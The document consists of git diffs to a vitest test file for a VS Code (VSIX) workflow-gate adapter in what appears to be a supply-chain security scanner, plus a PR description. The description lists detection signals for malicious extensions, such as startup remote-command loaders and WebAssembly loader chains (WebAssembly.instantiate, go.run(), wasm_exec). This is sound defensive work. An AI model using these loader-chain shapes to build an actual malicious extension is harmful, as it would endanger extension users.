   files: { path: string; size: number; sha256: string; flags: string[]; textSample?: string }[];
   packageJson: { name?: string; version?: string } | null;
@@ -218,4 +322,232 @@ function vsixArtifact(path: string, name: string, version: string) {
     ],
     packageJson: null,
   };
+}
+
+function vscodeSandboxResult(): SandboxResult {
+  return {
+    files: [
+      {
+        path: "extension/package.json",
+        size: 160,
+        sha256: "00",
+        flags: [],
+        textSample: JSON.stringify({
+          name: "remote-text-fetcher",
+          publisher: "example",
+          version: "1.0.0",
+          engines: { vscode: "^1.80.0" },
+          main: "./out/extension",
+          activationEvents: ["onCommand:remoteTextFetcher.run"],
+        }),
+      },
+      {
+        path: "extension/out/extension.js",
+        size: 26,
+        sha256: "00",
+        flags: [],
+        textSample: "exports.activate = () => {};",
+      },
+    ],
+    packageJson: null,
+  };
+}
+
+// Keyed by x-archive-format so parse-order (which is concurrent) cannot skew
+// which artifact gets which parsed result.
+function buildFormatLoaderMock(resultsByFormat: Record<string, SandboxResult>) {
+  const calls: string[] = [];
+  return {
+    calls,
+    binding: {
+      load: vi.fn(() => ({
+        getEntrypoint: () => ({
+          fetch: vi.fn(async (request: Request) => {
+            const format = request.headers.get("x-archive-format") ?? "";
+            calls.push(format);
+            const result = resultsByFormat[format];
+            if (!result) throw new Error(`unexpected archive format ${format}`);
+            return Response.json(result);
+          }),
+        }),
+      })),
+    },
+  };
+}
+
+function configBindings(): Record<string, string> {
+  const { privateKey } = generateKeyPairSync("rsa", { modulusLength: 2048 });
+  const privateKeyPem = privateKey.export({ type: "pkcs1", format: "pem" }).toString();
+  return {
+    GITHUB_APP_ID: "12345",
+    GITHUB_APP_SLUG: "drydock-test",
+    GITHUB_APP_CLIENT_ID: "client-id",
+    GITHUB_APP_CLIENT_SECRET: "client-secret",
+    GITHUB_APP_PRIVATE_KEY: privateKeyPem,
+    GITHUB_APP_WEBHOOK_SECRET: "webhook-secret-value-1234567890",
+    GITHUB_APP_STATE_SECRET: "0123456789abcdef0123456789abcdef",
+    BETTER_AUTH_SECRET: "fallback-secret-with-enough-entropy-aaaaaaaa",
+  };
+}
+
+// Auto-detect release target (ecosystem null): a `.vsix` must route by name.
+async function seedAutoDetectGate(opts: {
+  installationExternalId: string;
+  repositoryId: number;
+  runId: number;
+}) {
+  const db = createDb(env.DB);
+  const now = new Date();
+  const userId = `user_${crypto.randomUUID()}`;
+  await db.insert(schema.user).values({
+    id: userId,
+    name: "Tester",
+    email: `${userId}@example.com`,
+    emailVerified: true,
+    createdAt: now,
+    updatedAt: now,
+  });
+  const organizationId = await ensurePersonalOrganization(db, { userId });
+  const installation = await upsertInstallation(db, {
+    organizationId,
+    installationId: opts.installationExternalId,
+    accountLogin: "octo",
+    accountType: "Organization",
+    targetType: "Organization",
+    status: "active",
+    createdByUserId: null,
+  });
+  const releaseTarget = await createReleaseTarget(db, {
+    organizationId,
+    installationRowId: installation.id,
+    ecosystem: null,
+    repositoryId: opts.repositoryId,
+    repositoryFullName: "octo/example",
+    environment: "release",
+    createdByUserId: null,
+  });
+  const gateId = crypto.randomUUID();
+  await db.insert(schema.githubWorkflowGates).values({
+    id: gateId,
+    organizationId,
+    installationRowId: installation.id,
+    releaseTargetId: releaseTarget.id,
+    deliveryId: crypto.randomUUID(),
+    repositoryId: opts.repositoryId,
+    repositoryFullName: "octo/example",
+    environment: "release",
+    runId: opts.runId,
+    deploymentId: 909,
+    deploymentCallbackUrl: `https://api.github.com/repos/octo/example/actions/runs/${opts.runId}/deployment_protection_rule`,
+    eventAction: "requested",
+    status: "pending",
+    requestedAt: now,
+    createdAt: now,
+    updatedAt: now,
+  });
+  return { organizationId, gateId };
+}
+
+function stubGithubFetch(runId: number, artifactPaths: string[]) {
+  const bundleZip = makeZip(artifactPaths.map((path) => ({ path, body: `bytes for ${path}` })));
+  vi.stubGlobal(
+    "fetch",
+    vi.fn(async (input: RequestInfo | URL, init?: RequestInit) => {
+      const request = input instanceof Request ? input : new Request(input, init);
+      if (request.url.includes("/access_tokens")) {
+        return Response.json({ token: "ghs_install_token", expires_at: "2099-01-01T00:00:00Z" });
+      }
+      if (request.url.includes(`/actions/runs/${runId}/artifacts`)) {
+        return Response.json({
+          total_count: 1,
+          artifacts: [
+            {
+              id: 4242,
+              name: "release-candidates",
+              size_in_bytes: bundleZip.length,
+              expired: false,
+            },
+          ],
+        });
+      }
+      if (request.url.includes("/actions/artifacts/")) {
+        return new Response(bundleZip, {
+          status: 200,
+          headers: { "content-type": "application/zip" },
+        });
+      }
+      throw new Error(`unexpected fetch: ${request.url}`);
+    }),
+  );
+}
+
+interface ZipEntry {
+  path: string;
+  body: string;
+}
+
+function makeZip(entries: ZipEntry[]): Uint8Array {
+  const encoder = new TextEncoder();
+  const records: Uint8Array[] = [];
+  const central: Uint8Array[] = [];
+  let offset = 0;
+  for (const entry of entries) {
+    const body = encoder.encode(entry.body);
+    const nameBytes = encoder.encode(entry.path);
+    const crc = crc32(body);
+    const local = new Uint8Array(30 + nameBytes.length + body.length);
+    const lv = new DataView(local.buffer);
+    lv.setUint32(0, 0x04034b50, true);
+    lv.setUint16(4, 20, true);
+    lv.setUint32(14, crc, true);
+    lv.setUint32(18, body.length, true);
+    lv.setUint32(22, body.length, true);
+    lv.setUint16(26, nameBytes.length, true);
+    local.set(nameBytes, 30);
+    local.set(body, 30 + nameBytes.length);
+    records.push(local);
+
+    const c = new Uint8Array(46 + nameBytes.length);
+    const cv = new DataView(c.buffer);
+    cv.setUint32(0, 0x02014b50, true);
+    cv.setUint16(4, 20, true);
+    cv.setUint16(6, 20, true);
+    cv.setUint32(16, crc, true);
+    cv.setUint32(20, body.length, true);
+    cv.setUint32(24, body.length, true);
+    cv.setUint16(28, nameBytes.length, true);
+    cv.setUint32(42, offset, true);
+    c.set(nameBytes, 46);
+    central.push(c);
+    offset += local.length;
+  }
+  const centralBytes = concat(central);
+  const eocd = new Uint8Array(22);
+  const ev = new DataView(eocd.buffer);
+  ev.setUint32(0, 0x06054b50, true);
+  ev.setUint16(8, entries.length, true);
+  ev.setUint16(10, entries.length, true);
+  ev.setUint32(12, centralBytes.length, true);
+  ev.setUint32(16, offset, true);
+  return concat([...records, centralBytes, eocd]);
+}
+
+function concat(parts: Uint8Array[]): Uint8Array {
+  const total = parts.reduce((sum, p) => sum + p.length, 0);
+  const out = new Uint8Array(total);
+  let i = 0;
+  for (const part of parts) {
+    out.set(part, i);
+    i += part.length;
+  }
+  return out;
+}
+
+function crc32(bytes: Uint8Array): number {
+  let crc = 0xffffffff;
+  for (const byte of bytes) {
+    crc ^= byte;
+    for (let i = 0; i < 8; i += 1) crc = (crc >>> 1) ^ (0xedb88320 & -(crc & 1));
+  }
+  return (crc ^ 0xffffffff) >>> 0;
 }

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -171,6 +171,26 @@ describe("VS Code workflow-gate adapter", () => {
       ]),
     ).toThrow(/version 1.0.1 disagrees with 1.0.0/);
   });
+
+  test("fails closed on case-only duplicate VSIX identities", () => {
+    // The Marketplace resolves publisher/name case-insensitively and the parser
+    // accepts grandfathered capitalized names, so example.Remote-Text-Fetcher and
+    // example.remote-text-fetcher are the same extension. They must collapse to a
+    // single identity and fail closed, not split into two review candidates.
+    expect(() =>
+      vscodeWorkflowGateAdapter.prepareReleaseCandidates([
+        vsixArtifact("dist/remote-text-fetcher-1.0.0.vsix", "Remote-Text-Fetcher", "1.0.0"),
+        vsixArtifact("dist/remote-text-fetcher-copy-1.0.0.vsix", "remote-text-fetcher", "1.0.0"),
+      ]),
+    ).toThrow(/more than one VSIX artifact/);
+  });
+
+  test("preserves the original extension id casing for a single VSIX", () => {
+    const [candidate] = vscodeWorkflowGateAdapter.prepareReleaseCandidates([
+      vsixArtifact("dist/remote-text-fetcher-1.0.0.vsix", "Remote-Text-Fetcher", "1.0.0"),
+    ]);
+    expect(candidate.package.name).toBe("example.Remote-Text-Fetcher");
+  });
 });
 
 // ── Integration: auto-detect VSIX bundle through the shared runner ────────────

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -1,0 +1,132 @@
+import { createExecutionContext, env } from "cloudflare:test";
+import { describe, expect, test, vi } from "vitest";
+import { validateReleaseTargetShape } from "../../server/lib/github-app/validation";
+import {
+  classifyBundleArtifact,
+  getWorkflowGateAdapter,
+  supportedWorkflowGateEcosystems,
+} from "../../server/lib/workflow-gates/registry";
+import { resolveBundleArtifacts } from "../../server/lib/workflow-gates/resolve";
+import { vscodeWorkflowGateAdapter } from "../../server/lib/workflow-gates/vscode";
+import type { ResolvedReleaseBundle } from "../../server/lib/github-app/artifacts";
+
+const SHA = "cd".repeat(32);
+
+describe("VS Code workflow-gate adapter", () => {
+  test("registers vscode and classifies VSIX artifacts", () => {
+    expect(getWorkflowGateAdapter("vscode")).toBe(vscodeWorkflowGateAdapter);
+    expect(supportedWorkflowGateEcosystems()).toEqual(
+      expect.arrayContaining(["pypi", "npm", "vscode"]),
+    );
+    expect(classifyBundleArtifact("dist/example.remote-text-fetcher-1.0.0.vsix")).toEqual({
+      ecosystem: "vscode",
+      kind: "vsix",
+    });
+  });
+
+  test("accepts vscode release targets", () => {
+    expect(() =>
+      validateReleaseTargetShape({
+        ecosystem: "vscode",
+        repositoryId: 123,
+        repositoryFullName: "octo/example",
+        environment: "vscode",
+        installationRowId: "installation",
+        organizationId: "org",
+        artifactName: null,
+        createdByUserId: null,
+      }),
+    ).not.toThrow();
+  });
+
+  test("parses VSIX bytes through the shared ZIP sandbox and prepares a scan candidate", async () => {
+    const bundle: ResolvedReleaseBundle = {
+      artifactId: 1,
+      artifactName: "vscode-release-candidate",
+      artifactSizeBytes: 1,
+      artifacts: [
+        {
+          path: "dist/remote-text-fetcher-1.0.0.vsix",
+          bytes: new Uint8Array([1, 2, 3]),
+          sha256: SHA,
+          ecosystem: "vscode",
+          kind: "vsix",
+        },
+      ],
+    };
+
+    const loader = buildLoaderMock({
+      files: [
+        {
+          path: "extension/package.json",
+          size: 120,
+          sha256: "00",
+          flags: [],
+          textSample: JSON.stringify({
+            name: "remote-text-fetcher",
+            publisher: "example",
+            version: "1.0.0",
+            engines: { vscode: "^1.80.0" },
+            main: "./out/extension",
+            activationEvents: ["onStartupFinished"],
+          }),
+        },
+        {
+          path: "extension/out/extension.js",
+          size: 26,
+          sha256: "00",
+          flags: [],
+          textSample: "exports.activate = () => {};",
+        },
+      ],
+      packageJson: null,
+    });
+    const parsed = await resolveBundleArtifacts(
+      { ...env, LOADER: loader.binding as unknown as WorkerLoader } as Cloudflare.Env,
+      buildCtxWithGateway(),
+      bundle,
+    );
+    expect(loader.calls).toEqual(["zip"]);
+    expect(parsed[0].files.some((file) => file.path === "extension/package.json")).toBe(true);
+    const [candidate] = vscodeWorkflowGateAdapter.prepareReleaseCandidates(parsed);
+    expect(candidate).toMatchObject({
+      ecosystem: "vscode",
+      package: { name: "example.remote-text-fetcher", version: "1.0.0" },
+    });
+    expect(candidate.pipelineInput.manifest).toMatchObject({
+      ecosystem: "vscode",
+      package: "example.remote-text-fetcher",
+      version: "1.0.0",
+    });
+  });
+});
+
+interface SandboxResult {
+  files: { path: string; size: number; sha256: string; flags: string[]; textSample?: string }[];
+  packageJson: { name?: string; version?: string } | null;
+}
+
+function buildLoaderMock(result: SandboxResult) {
+  const calls: string[] = [];
+  return {
+    calls,
+    binding: {
+      load: vi.fn(() => ({
+        getEntrypoint: () => ({
+          fetch: vi.fn(async (request: Request) => {
+            calls.push(request.headers.get("x-archive-format") ?? "");
+            return Response.json(result);
+          }),
+        }),
+      })),
+    },
+  };
+}
+
+function buildCtxWithGateway() {
+  const ctx = createExecutionContext() as ExecutionContext & {
+    exports: { NpmStageGateway(options: { props: unknown }): Fetcher };
+  };
+  ctx.exports = { NpmStageGateway: vi.fn(() => ({ fetch: vi.fn() }) as unknown as Fetcher) };
+  return ctx;
+}

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -8,7 +8,10 @@ import {
 } from "../../server/lib/workflow-gates/registry";
 import { resolveBundleArtifacts } from "../../server/lib/workflow-gates/resolve";
 import { vscodeWorkflowGateAdapter } from "../../server/lib/workflow-gates/vscode";
-import type { ResolvedReleaseBundle } from "../../server/lib/github-app/artifacts";
+import {
+  type ResolvedReleaseBundle,
+  WorkflowArtifactError,
+} from "../../server/lib/github-app/artifacts";
 
 const SHA = "cd".repeat(32);
 
@@ -98,6 +101,29 @@ describe("VS Code workflow-gate adapter", () => {
       package: "example.remote-text-fetcher",
       version: "1.0.0",
     });
+  });
+
+  test("fails closed when a VSIX artifact has no extension manifest", () => {
+    expect(() =>
+      vscodeWorkflowGateAdapter.prepareReleaseCandidates([
+        {
+          path: "dist/malformed.vsix",
+          sha256: SHA,
+          ecosystem: "vscode",
+          kind: "vsix",
+          files: [
+            {
+              path: "extension/out/extension.js",
+              size: 26,
+              sha256: "00",
+              flags: [],
+              textSample: "exports.activate = () => {};",
+            },
+          ],
+          packageJson: null,
+        },
+      ]),
+    ).toThrow(WorkflowArtifactError);
   });
 });
 

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -125,6 +125,22 @@ describe("VS Code workflow-gate adapter", () => {
       ]),
     ).toThrow(WorkflowArtifactError);
   });
+
+  test("fails closed when a release contains duplicate VSIX identities", () => {
+    expect(() =>
+      vscodeWorkflowGateAdapter.prepareReleaseCandidates([
+        vsixArtifact("dist/remote-text-fetcher-1.0.0.vsix", "remote-text-fetcher", "1.0.0"),
+        vsixArtifact("dist/remote-text-fetcher-copy-1.0.0.vsix", "remote-text-fetcher", "1.0.0"),
+      ]),
+    ).toThrow(/more than one VSIX artifact/);
+
+    expect(() =>
+      vscodeWorkflowGateAdapter.prepareReleaseCandidates([
+        vsixArtifact("dist/remote-text-fetcher-1.0.0.vsix", "remote-text-fetcher", "1.0.0"),
+        vsixArtifact("dist/remote-text-fetcher-1.0.1.vsix", "remote-text-fetcher", "1.0.1"),
+      ]),
+    ).toThrow(/version 1.0.1 disagrees with 1.0.0/);
+  });
 });
 
 interface SandboxResult {
@@ -155,4 +171,28 @@ function buildCtxWithGateway() {
   };
   ctx.exports = { NpmStageGateway: vi.fn(() => ({ fetch: vi.fn() }) as unknown as Fetcher) };
   return ctx;
+}
+
+function vsixArtifact(path: string, name: string, version: string) {
+  return {
+    path,
+    sha256: SHA,
+    ecosystem: "vscode",
+    kind: "vsix",
+    files: [
+      {
+        path: "extension/package.json",
+        size: 120,
+        sha256: "00",
+        flags: [],
+        textSample: JSON.stringify({
+          name,
+          publisher: "example",
+          version,
+          engines: { vscode: "^1.80.0" },
+        }),
+      },
+    ],
+    packageJson: null,
+  };
 }

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -3,6 +3,7 @@ import { describe, expect, test, vi } from "vitest";
 import { validateReleaseTargetShape } from "../../server/lib/github-app/validation";
 import {
   classifyBundleArtifact,
+  detectArchiveEcosystems,
   getWorkflowGateAdapter,
   supportedWorkflowGateEcosystems,
 } from "../../server/lib/workflow-gates/registry";
@@ -25,6 +26,28 @@ describe("VS Code workflow-gate adapter", () => {
       ecosystem: "vscode",
       kind: "vsix",
     });
+  });
+
+  test("does not claim generic tar archives during auto-detect", () => {
+    const claims = detectArchiveEcosystems({
+      packageJson: { name: "npm-package", version: "1.0.0" },
+      files: [
+        {
+          path: "extension/package.json",
+          size: 120,
+          sha256: "00",
+          flags: [],
+          textSample: JSON.stringify({
+            name: "remote-text-fetcher",
+            publisher: "example",
+            version: "1.0.0",
+            engines: { vscode: "^1.80.0" },
+          }),
+        },
+      ],
+    });
+
+    expect(claims).toEqual([{ ecosystem: "npm", kind: "tarball" }]);
   });
 
   test("accepts vscode release targets", () => {


### PR DESCRIPTION
## Summary
Adds `vscode` as a workflow-gate ecosystem for VSIX artifacts so GitHub gates can review VS Code extension releases alongside PyPI/npm. The adapter parses `extension/package.json`, normalizes `extension/*` paths for shared JS/package rules, and derives identity as `publisher.name@version`.

High-signal VS Code findings now cover broad startup activation, startup remote-command loader chains, startup WebAssembly loader chains, undeclared configuration reads, and transitive extension installs. The WebAssembly rule targets the GlassWASM shape: startup activation + bundled `.wasm` + loader evidence such as `WebAssembly.instantiate*`, `new Go()`, `go.run()`, or `wasm_exec`.

Local checks run:
- `pnpm exec vitest run test/vscode.test.mjs test/security-corpus-vscode.test.mjs`
- `pnpm run lint`
- `pnpm run typecheck`
- `pnpm run format:check`
- `pnpm run test`

Docs updated for the new VSIX startup WebAssembly-loader coverage.

Link to Devin session: https://app.devin.ai/sessions/9e4095490c2447df956212439450e22d
Requested by: @JoviDeCroock